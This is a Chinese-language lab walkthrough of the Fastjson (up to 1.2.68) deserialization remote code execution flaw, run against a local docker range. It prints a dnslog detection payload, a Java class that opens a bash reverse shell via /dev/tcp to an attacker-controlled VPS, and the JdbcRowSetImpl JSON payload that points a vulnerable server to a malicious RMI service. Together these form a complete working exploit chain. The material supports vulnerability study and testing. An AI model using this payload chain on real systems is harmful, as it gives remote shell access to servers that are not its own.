Fastjson 反序列化漏洞

一、漏洞简介

Fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞

Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链

Fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

在Fastjson<=1.2.68的版本中,通过新的Gadgets绕过autoType开关,在autoType关闭的情况下仍然可以绕过黑白名单防御机制,通过反序列化漏洞在服务器上执行任意代码

二、漏洞影响

fastjson <= 1.2.68

三、靶场部署

启动环境(我是启动过一次,首次启动需要进行编译,需要1-2分钟左右)

docker-compose up -d

查看启动的端口。

docker ps

查看自己的IP

Fastjson 反序列化漏洞_第1张图片

访问搭建的靶场。

Fastjson 反序列化漏洞_第2张图片

四、漏洞检测

利用dnslog检测漏洞是否存在。

Fastjson 反序列化漏洞_第3张图片

通过burp抓包,将该页面的包发送给重发器,并添加如下内容。

{
	"zeo":{
    	"@type":"java.net.Inet4Address",
    	"val":"dnslog"
    	}
}

Fastjson 反序列化漏洞_第4张图片

dnslog能刷新出数据证明漏洞存在,反之漏洞不存在

Fastjson 反序列化漏洞_第5张图片

五、漏洞复现

将如下代码保存为Exploit.java,代码中对应的vps地址换成自己的IP地址。

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader; public class Exploit{    public Exploit() throws Exception {        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/VPS的IP/8888 0>&1"});        InputStream is = p.getInputStream();        BufferedReader reader = new BufferedReader(new InputStreamReader(is));         String line;        while((line = reader.readLine()) != null) {            System.out.println(line);        }         p.waitFor();        is.close();        reader.close();        p.destroy();    }     public static void main(String[] args) throws Exception {    }}

使用javac Exploit.java编译java文件生成Exploit.class。

Fastjson 反序列化漏洞_第6张图片

将Exploit.class文件和Exploit.java文件放在同一个文件夹中,并且在当前目录下使用如下命令开启一个轻量级的http服务

python -m http.server 8081

开启成功后访问该服务。

Fastjson 反序列化漏洞_第7张图片

再开一个窗口,监听8888端口用作反弹shell监听:

下载marshalsec工具,并启动rmi服务。

marshalsec下载链接

Fastjson 反序列化漏洞_第8张图片

将开始用的三个端口开放。

Fastjson 反序列化漏洞_第9张图片

在重发器中发送如下内容。

 {    
"b":{        
	"@type":"com.sun.rowset.JdbcRowSetImpl",        		"dataSourceName":"rmi://192.168.0.122:9999/#Exploit",        		"autoCommit":true   
 }    
}

Fastjson 反序列化漏洞_第10张图片

监听成功

Fastjson 反序列化漏洞_第11张图片

你可能感兴趣的:(网络,安全)